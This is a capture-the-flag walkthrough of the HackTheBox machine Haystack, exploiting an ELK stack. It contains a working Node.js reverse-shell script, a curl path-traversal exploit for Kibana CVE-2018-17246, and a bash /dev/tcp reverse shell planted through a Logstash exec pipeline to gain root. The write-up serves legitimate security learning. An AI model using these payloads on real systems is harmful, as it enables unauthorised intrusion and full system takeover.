HackTheBox - Haystack
Haystack is a very interesting box for learning more about the increasingly popular ELK (Elasticsearch, Logstash, Kibana) stack. The user part is quite CTF-like, while the root part is a more realistic scenario.
First things first, let’s add the box IP to the hosts file:
[hg8@archbook ~]$ echo '10.10.10.115 haystack.htb' >> /etc/hosts
User Flag
Recon
Let’s start with the classic nmap scan:
[hg8@archbook ~]$ nmap -sV -sT -sC 10.10.10.115
Alright, nothing surprising here: SSH, HTTP, and port 9200, which is the port used by Elasticsearch. Let’s start.
Steganography
Once opening http://haystack.htb we are greeted with a single image.
<html><body><img src="needle.jpg" /></body></html>
gobuster doesn’t find anything else interesting, so let’s check this image:
[hg8@archbook ~]$ wget haystack.htb/needle.jpg
So far so good, nothing suspicious. Let’s see if we can find strings in it:
[hg8@archbook ~]$ strings needle.jpg
Let’s decode this base64 string:
[hg8@archbook ~]$ echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
la aguja en el pajar es "clave"
A hint, meaning "the needle in the haystack is 'key'". Let’s keep clave in mind (Spanish for "key"). I think there is nothing else to find on the HTTP service, so let’s move on to the Elasticsearch instance.
Elasticsearch
Opening port 9200 returns the following JSON:
[hg8@archbook ~]$ http haystack.htb:9200
It’s a classic Elastic cluster, running version 6.4.2 (not the most recent one).
We can use the _cat endpoint to list all indices:
[hg8@archbook ~]$ http "haystack.htb:9200/_cat/indices"
So we have bank with 1000 records and quotes with 253 records. Let’s search across those documents to see if we can find something interesting, with our previous hint in mind.
According to the documentation, we can use the _search endpoint to search across all documents. Searching for the keyword key doesn’t return any interesting user or information. Let’s try with the clave keyword we found in the image:
[hg8@archbook ~]$ http "haystack.htb:9200/_search?q=clave"
Neat, that sounds promising. Let’s decode:
[hg8@archbook ~]$ echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security
A username and a password, couldn’t ask for anything better! Are these SSH credentials?
[hg8@archbook ~]$ ssh security@haystack.htb
First step done. Time for root.
Root flag
Now that we have user, let’s try to elevate privileges. Privilege-escalation enumeration scripts output nothing really interesting, so let’s focus again on the ELK stack, which seems to be the core of this box.
Pivot security -> kibana user
Kibana and Logstash are installed, but their configuration files are inaccessible to the security user:
[security@haystack conf.d]$ cat /etc/passwd
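When hunting for pivot targets, a compact view of /etc/passwd helps. This generic one-liner (nothing box-specific) prints each account with its shell, so service users with nologin stand out from real accounts:

```shell
# Print username and shell columns from /etc/passwd;
# accounts with a real shell are the candidate pivot users.
cut -d: -f1,7 /etc/passwd
```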
Seems like we will need to pivot to the kibana or logstash user to make progress.
For now we don’t have any information about either Kibana or Logstash. Let’s check Elasticsearch again:
[hg8@archbook ~]$ http haystack.htb:9200
Elasticsearch is at version 6.4.2, with a build date of September 2018. That’s quite old. And indeed, after a bit of Google-fu, we stumble upon CVE-2018-17246:
Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
More information is available on the CyberArk website, including an example of how to run this exploit.
First we need to write a NodeJS reverse shell (I used the one found here) to the /tmp/hg8.js file:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    // Replace with your attacking machine IP; the port must match the netcat listener below.
    client.connect(8585, "10.10.10.10", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // prevents the Node.js application from crashing
})();
Start a netcat listener for the reverse shell:
nc -l -vv -p 8585
Let’s now launch the exploit on the local instance of Kibana. According to the documentation, Kibana runs on port 5601:
The default settings configure Kibana to run on localhost:5601.
We now have all the information needed, so let’s launch our exploit:
curl "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../tmp/hg8.js"
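The long ../ chain in the apis parameter simply walks up to the filesystem root before descending into /tmp, so the Console plugin ends up loading our file. You can check what such a path resolves to locally with GNU realpath -m (the Kibana install prefix used here is only an illustrative assumption):

```shell
# -m resolves the path without requiring its components to exist;
# excess ../ components are clamped at the filesystem root.
realpath -m "/usr/share/kibana/src/../../../../../../../../../../../tmp/hg8.js"
# → /tmp/hg8.js
```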
On our netcat listener the connection appears:
[hg8@archbook ~]$ nc -l -vv -p 8585
Good, we are the kibana user now.
Let’s upgrade our shell to a fully interactive one to make work easier (check out this blog post for more information):
$ python -c 'import pty;pty.spawn("/bin/bash")'
Logstash -> root
Looking around, /opt/kibana/ turns out to be empty and /etc/elasticsearch/ still can’t be accessed. However, /etc/logstash/ belongs to the kibana group, so we can read its contents. Let’s dig.
As a reminder, Logstash is a tool that collects various logs, parses them, and writes the parsed data to an Elasticsearch cluster:
Logstash (part of the Elastic Stack) integrates data from any source, in any format with this flexible, open source collection, parsing, and enrichment pipeline.
https://www.elastic.co/fr/products/logstash
Reading the startup.options file, one piece of information catches the eye:
$ cat /etc/logstash/startup.options
So Logstash runs not as the logstash user but as root. We are on the right track.
The conf.d folder contains three files. According to their contents, here is what each file does:
- input.conf tells Logstash where to look for logs.
- filter.conf defines which data is processed and which is ignored.
- output.conf defines what to do with the parsed data.
Let’s look first at input.conf and output.conf:
$ cat input.conf
According to this config, every 10 seconds Logstash will:
- Check for files named logstash_* in the /opt/kibana/ folder:
path => "/opt/kibana/logstash_*"
- Check the file content for data matching the filter (a regex) defined in filter.conf.
- Send the matched data to be executed in the background:
exec {
Good, it seems we can write any command in a file named /opt/kibana/logstash_* and it should be run as root. Neat.
But first we have to make sure the command matches the filter, so it gets parsed correctly by Logstash. Let’s understand that filter:
$ cat filter.conf
The syntax looks complicated at first. The Logstash documentation presents grok as:
Grok is a great way to parse unstructured log data into something structured and queryable.
So it’s a kind of regex. Let’s break it down step by step:
- Ejecutar\s*comando\s*:\s+ is a plain regex, meaning the line has to begin with this sentence ("Execute command:" in Spanish).
- %{GREEDYDATA:comando} is the interesting grok part. According to the grok pattern source, GREEDYDATA corresponds to .* in regex.
So basically, when given the line Ejecutar comando : id, grok will match it, take the id part, and pass it as the comando variable to the Logstash output (command => "%{comando} &", as seen in output.conf).
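The grok pattern can be emulated locally with a Perl-compatible regex to see exactly what would land in comando (this uses GNU grep’s -P flag; \K discards the matched prefix):

```shell
# Everything after "Ejecutar comando : " is captured, just like GREEDYDATA.
echo 'Ejecutar comando : id' | grep -oP 'Ejecutar\s*comando\s*:\s+\K.*'
# → id
```

Logstash then substitutes that capture into command => "%{comando} &" and runs it in the background.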
Let’s put all this information together and try to get a root shell.
First, as usual, let’s open a netcat listener:
nc -l -vv -p 4485
Then create the file Logstash will take as input (/opt/kibana/logstash_*), with content matching filter.conf. The line must start with the Ejecutar comando : prefix, otherwise the grok filter won’t match and nothing gets executed:
echo "Ejecutar comando : bash -i >& /dev/tcp/10.10.10.10/4485 0>&1" > /opt/kibana/logstash_hg8
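Since a payload that doesn’t match the grok prefix is silently dropped, it’s worth sanity-checking the line locally against an equivalent regex before writing it on the target (again using GNU grep’s -P):

```shell
# Fail fast if the payload would not match the filter's prefix pattern.
payload='Ejecutar comando : bash -i >& /dev/tcp/10.10.10.10/4485 0>&1'
echo "$payload" | grep -qP '^Ejecutar\s*comando\s*:\s+\S' && echo "payload matches filter"
# → payload matches filter
```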
We then wait a bit, and fairly quickly we get an incoming connection as root:
[hg8@archbook ~]$ nc -l -vv -p 4485
As always, don’t hesitate to contact me with any questions or feedback ;)
See you next time!
-hg8